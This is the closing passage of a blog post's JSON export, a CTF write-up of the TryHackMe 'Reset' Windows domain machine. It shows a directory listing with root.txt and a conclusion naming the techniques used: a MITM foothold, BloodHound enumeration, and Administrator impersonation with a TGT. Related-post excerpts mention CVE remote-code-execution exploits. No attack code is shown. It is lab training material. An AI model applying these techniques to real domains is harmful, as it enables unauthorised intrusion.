#BABED8\">dir<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> Volume <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> drive C has no label.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> Volume Serial Number is A8A4<\/span><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">C362<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> Directory of C:\\Users\\Administrator\\Desktop<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F78C6C\">07<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">14<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">07<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">23<\/span><span style=\"color: #BABED8\"> AM    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">DIR<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">          .<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F78C6C\">07<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">14<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">07<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">23<\/span><span style=\"color: #BABED8\"> AM    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">DIR<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">          ..<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F78C6C\">06<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2016<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">36<\/span><span style=\"color: #BABED8\"> PM               <\/span><span style=\"color: #F78C6C\">527<\/span><span style=\"color: #BABED8\"> EC2 Feedback.website<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F78C6C\">06<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2016<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">36<\/span><span style=\"color: #BABED8\"> PM               <\/span><span style=\"color: #F78C6C\">554<\/span><span style=\"color: #BABED8\"> EC2 Microsoft Windows Guide.website<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F78C6C\">06<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">04<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">37<\/span><span style=\"color: #BABED8\"> PM                <\/span><span style=\"color: #F78C6C\">30<\/span><span style=\"color: #BABED8\"> root.txt<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">               <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #BABED8\"> File<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">s<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #F78C6C\">111<\/span><span style=\"color: #BABED8\"> bytes<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">               <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #BABED8\"> Dir<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">s<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">12<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #F78C6C\">381<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #F78C6C\">659<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #F78C6C\">136<\/span><span style=\"color: #BABED8\"> bytes free<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h3>\n\n\n\n<p>This was a hard machine. It took quite a bit to figure out that the MITM attack was the way to get a foothold. After a lot of enumeration, using BloodHound multiple times, and analyzing data, we were finally able to escalate our privileges by impersonating the Administrator using a TGT ticket.<\/p>\n\n\n\n<p>Please let me know if your approach was different while solving the box. I would like to hear if there were any easy ways that I missed. If you have any questions, feel free to ask by leaving a comment on the post. Thanks for reading \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP We will begin with enumerating SMB. The [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,13,12],"tags":[],"class_list":["post-359","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-linux","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":359,"position":0},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":359,"position":1},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":359,"position":2},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In &quot;Active Directory&quot;","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":359,"position":3},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":625,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","url_meta":{"origin":359,"position":4},"title":"CVE-2023-33831","author":"ishsome","date":"May 9, 2024","format":false,"excerpt":"This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":359,"position":5},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=359"}],"version-history":[{"count":11,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/359\/revisions"}],"predecessor-version":[{"id":393,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/359\/revisions\/393"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}